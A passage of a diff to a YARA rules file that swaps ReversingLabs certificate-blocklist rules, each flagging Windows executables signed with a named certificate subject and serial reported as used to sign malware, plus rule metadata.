90 tags = "INFO, FILE" @@ -9162,22 +28953,22 @@ rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Olymp LLC" and (pe.signatures[i].serial=="00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures[i].serial=="d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4") and 1601895290<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JOHN WILLIAM RICHARD" and pe.signatures[i].serial=="06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ccb4da10-3178-5d8f-be17-9c689e794418" + id = "44fa007f-f5f7-5001-8b92-eb4a657ea756" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6236-L6252" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L351-L367" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab" score = 75 quality = 90 tags = "INFO, FILE" @@ -9187,22 +28978,22 @@ rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Service lab LLC" and pe.signatures[i].serial=="53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures[i].serial=="11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ce437144-0f99-5c41-8d15-edeceb34de4d" + id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6254-L6270" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L369-L385" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff" score = 75 quality = 90 tags = "INFO, FILE" @@ -9212,22 +29003,22 @@ rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nordkod LLC" and pe.signatures[i].serial=="0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures[i].serial=="6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "daae5f42-59ff-5838-9444-93357eaa9d60" + id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6272-L6288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L387-L403" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb" score = 75 quality = 90 tags = "INFO, FILE" @@ -9237,22 +29028,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ARTBUD RADOM SP Z O O" and pe.signatures[i].serial=="0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ohanae" and pe.signatures[i].serial=="32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f91ecc17-7406-552a-8864-c9e1657a5ca9" + id = "e5059974-9ea2-5497-a728-c21a6cdd30e4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6290-L6308" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L405-L421" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808" score = 75 quality = 90 tags = "INFO, FILE" @@ -9262,22 +29053,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Elite Web Development Ltd." and (pe.signatures[i].serial=="00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures[i].serial=="6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff") and 1600176940<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FreeVox SA" and pe.signatures[i].serial=="01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076" + id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6310-L6326" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L423-L439" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9" score = 75 quality = 90 tags = "INFO, FILE" @@ -9287,22 +29078,22 @@ rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MUSTER PLUS SP Z O O" and pe.signatures[i].serial=="04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "S2BVISIO BELGIQUE SA" and pe.signatures[i].serial=="55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a" + id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6328-L6346" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L441-L457" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325" score = 75 quality = 90 tags = "INFO, FILE" @@ -9312,22 +29103,22 @@ rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALEXIS SECURITY GROUP, LLC" and (pe.signatures[i].serial=="00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures[i].serial=="b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa") and 1574914319<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Porral Twinware S.L.L." and pe.signatures[i].serial=="09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34" + id = "4fb06917-ccbd-514c-a936-e337c31c6e65" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6348-L6366" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L459-L475" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0" score = 75 quality = 90 tags = "INFO, FILE" @@ -9337,22 +29128,22 @@ rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APP DIVISION ApS" and (pe.signatures[i].serial=="00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures[i].serial=="b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14") and 1603328400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "I.ST.SAN. Srl" and pe.signatures[i].serial=="0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3e451a5a-835b-572d-ab17-ff52d3614a86" + id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6368-L6386" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L477-L493" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8" score = 75 quality = 90 tags = "INFO, FILE" @@ -9362,22 +29153,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THRANE AGENTUR ApS" and (pe.signatures[i].serial=="00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures[i].serial=="ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23") and 1603369254<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PlanView, Inc." and pe.signatures[i].serial=="1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4fcd4e89-658c-593b-8f94-edd5df19da6e" + id = "40aed582-2960-5b42-acde-7350a2595b4b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6388-L6404" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L495-L511" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0" score = 75 quality = 90 tags = "INFO, FILE" @@ -9387,22 +29178,22 @@ rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hillcoe Software Inc." and pe.signatures[i].serial=="01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures[i].serial=="4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a" + id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6406-L6422" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L513-L529" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72" score = 75 quality = 90 tags = "INFO, FILE" @@ -9412,22 +29203,22 @@ rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Smart Line Logistics" and pe.signatures[i].serial=="06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures[i].serial=="67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4" + id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6424-L6442" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L531-L547" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7" score = 75 quality = 90 tags = "INFO, FILE" @@ -9437,22 +29228,22 @@ rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Insta Software Solution Inc." and (pe.signatures[i].serial=="00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures[i].serial=="1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f") and 1601733106<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Karim Lammali" and pe.signatures[i].serial=="06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e96fdf57-3884-526e-a704-93e783c95241" + id = "b4a56bbe-f2ba-52df-832d-35b92ab73683" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6444-L6460" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L549-L565" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855" score = 75 quality = 90 tags = "INFO, FILE" @@ -9462,22 +29253,22 @@ rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Umbor LLC" and pe.signatures[i].serial=="75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PS Partnership" and pe.signatures[i].serial=="04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "de9ef02d-a723-5013-9f91-e394edc23855" + id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6462-L6478" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L567-L583" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37" score = 75 quality = 90 tags = "INFO, FILE" @@ -9487,22 +29278,22 @@ rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ORGANICUP ApS" and pe.signatures[i].serial=="2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "The Motivo Group, Inc." and pe.signatures[i].serial=="0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "22bd8590-7a95-564c-ad77-fb20569de51d" + id = "dbe2a945-cf13-564a-a95a-24534c70a723" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6480-L6496" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L585-L601" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 